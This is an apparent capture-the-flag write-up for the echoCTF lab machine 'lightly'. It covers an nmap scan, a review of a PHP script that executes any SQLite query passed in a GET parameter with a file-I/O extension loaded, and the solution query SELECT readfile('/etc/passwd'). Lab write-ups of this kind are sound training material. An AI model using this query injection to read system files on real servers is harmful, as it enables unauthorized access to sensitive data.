Hackmex-prep
  • echoCTF Writeups
    • badwidth
    • druidmux
    • prisonbreak
    • lightly
    • zerotroll
Powered by GitBook
On this page
  1. echoCTF Writeups

lightly

### By b13ss3d ###

PreviousprisonbreakNextzerotroll

Last updated 8 months ago

There's also a video version, if you want to check it out:

Port Scanning

First we perform a port scan using nmap to identify open ports and the services and their versions running on these ports.

❯ nmap --open -sCV -n -Pn -T5 -v 10.0.160.170 -oN scan
<SNIP>

PORT   STATE SERVICE REASON  VERSION
80/tcp open  http    syn-ack nginx 1.18.0
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-favicon: Unknown favicon MD5: 844B11BD64CCAD62F48FD96A886544CA
| http-methods: 
|_  Supported Methods: GET HEAD POST

  • -p <ports>

  • -sCV combines the options -sC and -sV.

  • nmap help: -sC: equivalent to --script=default

  • -sV: Probe open ports to determine service/version info

  • -n: Never do DNS resolution

  • -vvv: Increase verbosity level

  • -oN <file>: Output scan in normal format.

The result confirms our expectation: a web server is running on port 80. Let's use a web browser to view the site’s content:

Code review

The content is the code shown in the image above. Let's break it down step by step:

 <?php
if(isset($_GET['QUERY']))
{
    header('Content-Type: text/plain');
    $db = new SQLite3(':memory:', SQLITE3_OPEN_CREATE | SQLITE3_OPEN_READWRITE);
    $db->loadExtension('libfileio.so');
    $db->enableExceptions(true);
    $results = $db->query($_GET['QUERY']);
    var_dump($results->fetchArray(SQLITE3_NUM));
} else {
    highlight_file(__file__);
}

  • The code starts by checking if a GET parameter named 'QUERY' is set using isset($_GET['QUERY'])

  • If 'QUERY' is set:

    1. It sets the content type of the response to plain text.

    2. It creates a new in-memory SQLite database.

    3. It loads an extension called 'libfileio.so'.

    4. It enables exceptions for the database operations.

    5. It executes the query provided in the GET parameter directly on the database.

    6. It fetches the results of the query as a numeric array and dumps them to the output.

  • If 'QUERY' is not set it displays the source code of the current file using highlight_file()

At this point you may be wondering, "What is libfileio.so???"

If you search for it on Google and look at the following result:

Here you will find a post on the SQLite Forum

In this post a user reported an issue with the loadable extension ext/misc/fileio.c, which throws the error "undefined symbol sqlite3_sqlitefileio_init." Another user suggests renaming the shared library to libfileio.so as a solution.

If you search for this file on Google and look at the following result:

You find a file written in C with a part that looks interesting:

Basically this code allows us to read files using readfile() and write files using writefile().

Solution

The main vulnerability here is the lack of validation. The script directly executes any SQL query passed to it through the 'QUERY' GET parameter without any kind of validation or escaping. For solving this target we have to read the /etc/passwd file, with the query SELECT readfile('/etc/passwd') this way:

lightly